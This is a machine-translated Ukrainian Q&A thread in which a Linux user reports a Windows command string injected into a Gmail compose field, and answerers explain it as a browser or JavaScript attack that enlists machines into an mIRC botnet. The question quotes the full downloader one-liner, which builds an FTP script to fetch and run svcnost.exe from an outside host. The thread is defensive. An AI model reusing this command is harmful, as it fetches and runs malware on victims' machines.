Як визначити, чи зламався мій комп'ютер Linux?

Мій домашній ПК зазвичай увімкнено, але монітор вимкнено. Цього вечора я повернувся додому з роботи і виявив, що схоже на спробу злому: у моєму браузері мій Gmail був відкритий (це я), але він був у режимі компонування із наступним у TOполі:

md / c echo відкрити cCTeamFtp.yi.org 21 >> ik & echo користувача ccteam10 765824 >> ik & echo бінарний >> ik & echo отримати svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe та вихід ехо Ви отримали власність

Це виглядає як код командного рядка Windows, і mdпочаток коду в поєднанні з тим, що Gmail знаходився в режимі композиції, дає зрозуміти, що хтось намагався запустити cmdкоманду. Я здогадуюсь, що мені пощастило, що я насправді не запускаю Windows на цьому ПК, але у мене є інші. Це перший раз, коли зі мною трапилось щось подібне. Я не гуру Linux, і в той час я не запускав жодної іншої програми, окрім Firefox.

Я абсолютно впевнений, що я цього не писав, і ніхто інший не був фізично за моїм комп’ютером. Також нещодавно я змінив свій пароль Google (і всі інші мої паролі) на щось подібне, vMA8ogd7bvтому не думаю, що хтось зламав мій обліковий запис Google.

Що щойно сталося? Як хтось натискає клавіші на моєму комп’ютері, коли це не стара бабуся машина Windows, на якій вже багато років працює зловмисне програмне забезпечення, а нещодавно нова установка Ubuntu?

Оновлення:
Дозвольте мені вирішити деякі моменти та питання:

• Я в Австрії, на селі. Мій маршрутизатор WLAN працює з WPA2 / PSK та середньо-сильним паролем, якого немає у словнику; мав би бути грубої сили і менше ніж 50 метрів звідси; ймовірно, що його зламали.
• Я використовую USB-провідну клавіатуру, тому знову дуже малоймовірно, що хтось міг би бути в зоні дії, щоб зламати її.
• Я не використовував комп’ютер у той час; це було простою вдома, поки я був на роботі. Це нетто-ПК на моніторі, тому я його рідко вимикаю.
• Машині всього два місяці, працює лише Ubuntu, і я не використовую дивне програмне забезпечення або відвідую дивні сайти. Це в основному Stack Exchange, Gmail та газети. Немає ігор. Ubuntu налаштований на постійне оновлення.
• Мені не відомо, що жодна послуга VNC працює; Я, звичайно, не встановив і не ввімкнув його. Я також не запускав жодних інших серверів. Я не впевнений, що за умовчанням вони працюють у Ubuntu?
• Я знаю всі IP-адреси в активності облікового запису Gmail. Я досить впевнений, що Google не був в'їздом.
• Я знайшов програму перегляду файлів журналу , але не знаю, що шукати. Допомога?

Те, що я насправді хочу знати, - і що насправді змушує мене почувати себе небезпечно: як хтось із Інтернету може створювати натискання клавіш на моїй машині? Як я можу запобігти цьому, не маючи про це все цікаво? Я не прихильник Linux, я батько, який спілкувався з Windows 20+ років і мені це набридло. І за всі 18 років роботи в Інтернеті я ніколи особисто не бачив жодної спроби злому, тому це для мене нове.

Я сумніваюся, що вам є про що турбуватися. Це була більш ніж ймовірна атака JavaScript, яка намагалася зробити диск за допомогою завантаження . Якщо вас турбує це, почніть використовувати NoScript і AdBlock Plus Firefox надбудови.

Навіть відвідуючи надійні веб-сайти, ви не безпечні, оскільки вони запускають код JavaScript від сторонніх рекламодавців, що може бути шкідливим.

Я схопив його і побіг у ВМ. Він встановив mirc, і це журнал статусу ... http://pastebin.com/Mn85akMk

Це автоматизована атака, яка намагається змусити вас завантажити mIRC та приєднатись до ботнету, що перетворить вас на спам-файли ... Це моє VM приєдналося і зробило з'єднання з низкою різних віддалених адрес, один з яких є autoemail-119.west320.com.

Запускаючи його в Windows 7, я повинен був прийняти підказку UAC та дозволити йому доступ через брандмауер.

Здається, є багато повідомлень про цю точну команду на інших форумах, і хтось навіть каже, що торрент-файл намагався виконати його, коли він закінчував завантаження ... Я не впевнений, як це можливо.

Я сам не користувався цим, але він повинен мати можливість показувати вам поточні мережеві з'єднання, щоб ви могли бачити, чи підключено ви щось із норми: http://netactview.sourceforge.net/download.html

Я погоджуюся з @ jb48394, що це, мабуть, експлуатація JavaScript, як і все інше в ці дні.

Той факт, що він намагався відкрити cmdвікно (див. Коментар @ torbengb ) та виконати зловмисну ​​команду, а не просто стримувати троянський диск у фоновому режимі, говорить про те, що він використовує деяку вразливість у Firefox, яка дозволяє йому вводити натискання клавіш, але не запустити код.

Це також пояснює, чому цей подвиг, чітко написаний виключно для Windows, також працював би в Linux: Firefox працює так само, як JavaScript у всіх операційних системах (принаймні, це намагається :)) . Якби це було викликано переповненням буфера або подібним експлуатуванням, призначеним для Windows, воно б просто розбило програму.

Щодо того, звідки взявся код JavaScript - можливо, це шкідливе оголошення Google (цикл оголошень у Gmail протягом дня) . Це не було б першого час .

Я виявив подібну атаку на іншій машині Linux. Здається, це якась команда FTP для Windows.

Це не відповідає на все ваше запитання, але у файлі журналу шукайте невдалі спроби входу.

Якщо у вашому журналі більше ніж п'ять невдалих спроб, то хтось намагався зламати root. Якщо у вас є успішна спроба входу, rootпоки ви були далеко від комп'ютера, ЗМІНУЙТЕ ЗМІНУЙТЕ ПАРОЛЬНЕ СЛОВО !! Я маю на увазі ПРАВО ЗАРАЗ! Переважно щось алфавітно-цифрове і приблизно 10 символів.

З отриманими вами повідомленнями ( echoкомандами) це справді звучить як якийсь незрілий малюк сценарію . Якби це справжній хакер, який знає, що він робить, ви, мабуть, досі не знали б про це.

whois звіти west320.com належить Microsoft.

UPnP та Vino (Система -> Налаштування -> Віддалений робочий стіл) у поєднанні зі слабким паролем Ubuntu?

Чи використовували ви нестандартні сховища?

DEF CON щороку проводить конкуренцію Wi-Fi щодо того, як далеко можна дістатися до точки доступу до Wi-Fi - останнє, що я чув, це було 250 миль.

Якщо ви дійсно хочете, щоб вас налякали, подивіться на скріншоти командно-n-центру управління ботнету Zeus . Жодна машина не є безпечною, але Firefox у Linux безпечніший за решту. Ще краще, якщо ви запускаєте SELinux .